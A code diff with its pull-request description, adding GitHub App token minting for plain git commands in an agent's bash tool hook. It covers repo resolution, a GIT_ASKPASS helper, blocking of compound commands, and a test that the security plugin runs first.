+      // Only App auth re-mints per repo. Classic/fine-grained PATs and absent
+      // tokens are left untouched, exactly as the gh path treats them.
+      if (classifyGhToken(process.env.GH_TOKEN) !== 'app') return
+
+      const decision = await analyzeGitCommand(command, { cwd: agentDir, resolvers: defaultGitResolvers })
+      if (decision.kind === 'pass-through') return
+      if (decision.kind === 'block') return { block: true, reason: decision.reason }
+
+      const result = await resolveTokenForRepo(decision.repoSlug)
+      if (result.kind === 'unavailable') return { block: true, reason: result.reason }
+
+      const askpass = await ensureGitAskPassHelper()
+      const existing = event.args[TYPECLAW_INTERNAL_BASH_ENV]
+      const overlay = existing !== null && typeof existing === 'object' ? (existing as Record<string, string>) : {}
+      // Token rides in TYPECLAW_GIT_TOKEN (read by the askpass helper), never in
+      // argv/config. insteadOf rewrites SSH/scp remotes to https so the helper's
+      // credential applies; GIT_TERMINAL_PROMPT=0 fails fast instead of hanging.
+      event.args[TYPECLAW_INTERNAL_BASH_ENV] = {
+        ...overlay,
+        GIT_ASKPASS: askpass,
+        TYPECLAW_GIT_TOKEN: result.token,
+        GIT_TERMINAL_PROMPT: '0',
+        GIT_CONFIG_COUNT: '2',
+        GIT_CONFIG_KEY_0: 'url.https://github.com/.insteadOf',
+        GIT_CONFIG_VALUE_0: 'git@github.com:',
+        GIT_CONFIG_KEY_1: 'url.https://github.com/.insteadOf',
+        GIT_CONFIG_VALUE_1: 'ssh://git@github.com/',
+      }
+      if (decision.rewrittenCommand !== undefined) event.args.command = decision.rewrittenCommand
+      return
+    }
+
     return {
       hooks: {
         'tool.before': async (event) => {
           if (event.tool !== 'bash') return
           const command = event.args.command
-          if (typeof command !== 'string' || !command.includes('gh')) return
+          if (typeof command !== 'string') return
 
-          const review = await noteReviewCommand({ callId: event.callId, command })
-          if (review.detected !== null) {
-            const block = await verdictGuard.guard({
-              callId: event.callId,
-              workspace: review.detected.workspace,
-              prNumber: review.detected.prNumber,
-              verdict: review.detected.verdict,
-            })
-            if (block !== null) return block
+          if (command.includes('gh')) {
+            const ghResult = await handleGhCommand({ event, command })
+            if (ghResult !== 'fall-through') return ghResult
           }
-          if (review.dump !== null) return review.dump
 
-          const decision = analyzeGhCommand(command)
-          if (decision.kind === 'pass-through') return
-
-          const tokenClass = classifyGhToken(process.env.GH_TOKEN)
-          // Classic PATs reach every owner; nothing to inject or enforce.
-          if (tokenClass === 'cross-owner') return
-
-          if (decision.kind === 'block') return { block: true, reason: decision.reason }
-
-          // Fine-grained PATs are single-owner but cannot be re-minted per repo;
-          // the seeded GH_TOKEN is the only token we have. Leave it in place so
-          // `gh` fails honestly if the named repo is under a different owner.
-          if (tokenClass === 'fine-grained-pat') return
-
-          const result = await resolveTokenForRepo(decision.repoSlug)
-          if (result.kind === 'unavailable') return { block: true, reason: result.reason }
-          // Inject via the internal env overlay (delivered to the spawn / bwrap
-          // --setenv by the bash wrapper) so the token never enters the command
-          // string, where it could leak through logs or later hooks.
-          event.args[TYPECLAW_INTERNAL_BASH_ENV] = { GH_TOKEN: result.token }
-          // graphql consumed `-R/--repo` as a mint hint; `gh api` rejects it, so
-          // run the command with the flag stripped (token still rides in env).
-          if (decision.rewrittenCommand !== undefined) event.args.command = decision.rewrittenCommand
+          if (command.includes('git')) {
+            return await handleGitCommand({ event, command, agentDir: ctx.agentDir })
+          }
           return
         },
         'tool.after': async (event) => {

--- a/src/run/bundled-plugins.test.ts
+++ b/src/run/bundled-plugins.test.ts
@@ -32,4 +32,9 @@ describe('BUNDLED_PLUGINS', () => {
       'operator',
     ])
   })
+
+  test('security precedes github-cli-auth so gh/git token minting never runs on a blocked command', () => {
+    const names = BUNDLED_PLUGINS.map((p) => p.name)
+    expect(names.indexOf('security')).toBeLessThan(names.indexOf('github-cli-auth'))
+  })
 })


### PR DESCRIPTION
## Background

The `github-cli-auth` plugin already mints per-repo GitHub App installation tokens for `gh` commands (via `-R`/`--repo`). Plain `git` commands — `git push`, `git fetch`, `git clone`, etc. — have no `-R` flag and read credentials through `GIT_ASKPASS`, not `GH_TOKEN`. Without this PR, a `git push` to a private repo in a GitHub App-authenticated session either fails or falls back to whatever the container's default credentials are. There was no minting path for `git` at all.

## Summary

Four commits add end-to-end GitHub App token minting for plain `git` commands, parallel to the existing `gh` path.

**1. Repo resolver for plain git (`git-command.ts`, 391 lines).** `gh` names its target repo in argv; `git` implies it via a remote. The resolver walks: explicit `github.com` URL in argv → remote name via `git remote get-url` → the `branch.<cur>.pushRemote` / `remote.pushDefault` / `origin` fallback chain. Returns an `owner/name` slug or `pass-through` when unresolvable, so `git` fails honestly rather than us guessing a repo. Multi-owner commands (e.g. a clone list targeting two orgs) are blocked — a single minted token cannot authenticate all of them. Compound commands (`&&`, `;`, pipes, redirections, subshells) are blocked too, because the token arrives as an env overlay and any sibling process would inherit it. The one accepted prefix is `cd <path> && git …`, which is rewritten to `git -C <path> …` before execution.

**2. Token-free `GIT_ASKPASS` helper (`git-askpass.ts`, 49 lines).** `git` reads credentials from a `GIT_ASKPASS` script, not from `GH_TOKEN`. The helper emits `x-access-token` as username and the value of `TYPECLAW_GIT_TOKEN` (from env) as password. The script itself is constant and secret-free — it contains only the env var name. It is written once per process to `/usr/local/bin/typeclaw-git-askpass` (which is `--ro-bind` mounted into the bwrap sandbox) via a write-then-rename sequence so concurrent readers never see a partial file. `TYPECLAW_GIT_ASKPASS_PATH` overrides the default path for tests/CI.

**3. Plugin wiring (`index.ts`).** The `tool.before` hook is split into `handleGhCommand` and `handleGitCommand` helpers. `handleGitCommand` is gated on the App token class — classic PATs reach every owner, fine-grained PATs cannot be re-minted per repo, so both pass through unchanged. For App auth, the minted token is injected via `TYPECLAW_INTERNAL_BASH_ENV` (the existing overlay mechanism the bash wrapper delivers to the bwrap `--setenv`): `GIT_ASKPASS` points at the helper, `TYPECLAW_GIT_TOKEN` carries the minted token, `GIT_TERMINAL_PROMPT=0` prevents hang-on-prompt, and two `GIT_CONFIG_*` `insteadOf` entries rewrite SSH/scp remotes to `https://github.com/` so the credential applies regardless of remote URL scheme.

**4. Security ordering (`bundled-plugins.test.ts`).** Both the `gh` and `git` mint paths must fire after the security plugin's `tool.before` guards — a blocked exfil or tainted command must never reach the mint path. A focused assertion documents and enforces that ordering.

## What this does NOT do

- Does not affect classic PATs or fine-grained PATs — those pass through untouched for `git`, identical to how the `gh` path treats them.
- Does not change any other plugin, the bwrap sandbox config, or the security plugin itself.
- Does not mint tokens for non-remote git subcommands (`git status`, `git log`, etc.) — those return `pass-through` immediately.

## Review notes

**Load-bearing design decisions reviewers should verify:**

- The token never enters the command string or `git config`. It rides only in `TYPECLAW_GIT_TOKEN` env, delivered by the bash wrapper's env overlay. The askpass script is a constant that reads the env var; the token is absent from the script itself.
- The compound-command block (`COMPOSITION_REASON`) is the security fence. A token injected into env is visible to any sibling spawned in the same shell. The `cd … && git …` rewrite is the only permitted relaxation.
- The multi-owner block prevents one minted token (scoped to a single installation) from being attempted against a different owner's repo.
- The security-plugin ordering assertion in `src/run/bundled-plugins.test.ts` is the guard that keeps both mint paths downstream of the taint/exfil checks.

**Coverage:**

- `git-command.test.ts` — 194 lines covering URL parsing, remote resolution fallback chain, pass-through cases, inject cases, block cases, and the `cd`-rewrite path.
- `git-askpass.test.ts` — 46 lines covering write idempotency, concurrent-call coalescing, content correctness (no token in the script), and executable bit.
- `index.test.ts` additions — 121 lines of integration tests covering the full `tool.before` path for the git branch: env overlay shape, resolver receives correct slug, bridge-unavailable block, compound-command block, classic/fine-grained PAT pass-through, non-GitHub URL pass-through.
